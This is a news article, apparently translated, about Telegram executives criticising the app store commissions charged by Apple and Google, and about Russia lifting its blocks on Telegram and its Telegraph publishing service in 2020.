The day before, high-ranking Telegram Manager, Vice President of the company founded by Pavel Durov, Ilya Perekopsky, spoke at a panel discussion with Russian Prime Minister Mikhail Mishustin and representatives of the IT industry in Innopolis. He said that Apple and Google are holding back the development of startups by charging a tax of a 30 percent Commission from app developers. Almost simultaneously with Perekopsky's speech, Durov published an article in which he called for Apple to be legally obliged to install an alternative App Store on the iPhone.

Durov is sure that if this is not done, then app developers, in particular, from Russia, will be forced to sell their startups for little money. At the same time, Apple's capitalization will only grow.
“Preventing two supranational corporations from collecting taxes from all of humanity is not an easy task. Corporations employ thousands of lobbyists, lawyers, and PR agents, and their budgets are unlimited. At the same time, app developers are scattered and scared, as the fate of their projects depends entirely on the favor of Apple and Google," wrote Pavel Durov.

The head of the TelecomDaily information and analytical agency Denis Kuskov noted that changing the market is quite difficult because these two companies are leading it. Therefore, Durov needs to accept this fact.

Durov recalled that in 2016, Apple banned the Telegram team from launching its own game platform: "We had to remove the telegram games catalog that we had already created and almost the entire platform interface, otherwise Apple threatened to remove Telegram from the AppStore." According to Durov, in a similar way the iPhone manufacturer does with many other developers.

Telegraph service was unblocked in Russia


Russia stopped blocking the popular Telegram messenger almost a month ago. However, the related Telegraph service continued to be blocked. Now Russia has also unblocked the Telegraph platform for publishing and creating articles. 

The Telegraph platform was launched by the Telegram team in November 2016. It is designed to quickly create and publish articles, notes, and other similar content, a link to which can then be easily shared. Registration is not required for publication.

The blocking of the Telegra[.]ph service in Russia began at the end of 2018, a little later than the Telegram messenger.

According to the Roskomsvoboda resource, which closely monitors the registry of blocked sites, all pages with the Telegra.ph domain, which were blocked in Russia by the decision of a particular authority, are now excluded from the blocking registry. The last two similar pages were removed from the blacklist only on July 11.

It is interesting to note, according to Press Secretary of the President of Russia Dmitry Peskov, the cancellation of restrictions on access to the Telegram messenger in Russia is perceived positively in the Kremlin, as it is in line with the course of President Vladimir Putin on the development of the high-tech industry.

The Press Secretary of the Head of State also noted as a positive fact the participation of heads of the company that owns the messenger in government events on the development of the IT industry.
Recall that in Russia since April 2018, Telegram was blocked for non-compliance with the requirements for providing encryption keys, but during the coronavirus pandemic, the government began to use the messenger to distribute official information. In this regard, the State Duma even introduced a bill to unblock Telegram.  On June 18, Roskomnadzor decided to remove restrictions on access to the messenger, the creator of which, Pavel Durov, congratulated the Russians on this event.